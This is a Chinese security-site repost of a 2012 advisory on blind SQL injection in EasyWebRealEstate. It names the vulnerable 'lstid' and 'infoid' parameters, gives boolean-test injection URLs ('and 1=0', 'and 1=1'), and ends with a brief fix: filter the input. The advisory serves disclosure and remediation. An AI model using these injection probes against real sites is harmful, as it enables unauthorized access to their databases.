频道栏目
首页 > 安全 > 网站安全 > 正文

EasyWebRealEstate盲注缺陷及修复

2012-01-05 20:41:05      个评论      
收藏   我要投稿
标题: EasyWebRealEstate Blind SQL Injection Vulnerabilitiy
作者: H4ckCity Security Team  farbodmahini www.2cto.com  WwW.H4ckCity.Org
软件地址: www.easywebrealestate.com
影响所有版本: All Version
测试平台: GNU/Linux Ubuntu - Windows Server - win7
############################################################################
示例
#  http://www.2cto.com /[patch]/listings.php?lstid=1 [Blind SQL]
#  http://www.2cto.com /[patch]/index.php?current=tip&infoid=9' [Blind SQL]
#
#
#  Test Blind SQL Injection:
#
#
#  [-] False
#
#  http://www.2cto.com /[patch]/listings.php?lstid=1 and 1=0
#
#  [+] True
#
#  http://www.2cto.com /[patch]/listings.php?lstid=1 and 1=1
#
# 修复
 
过滤listings.php页面lstid参数输入
#
相关TAG标签 缺陷
上一篇:Typo3 v4.5-4.7远程代码执行(RFI/LFI)及修复
下一篇:SyriaNobles sql注射缺陷及修复
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站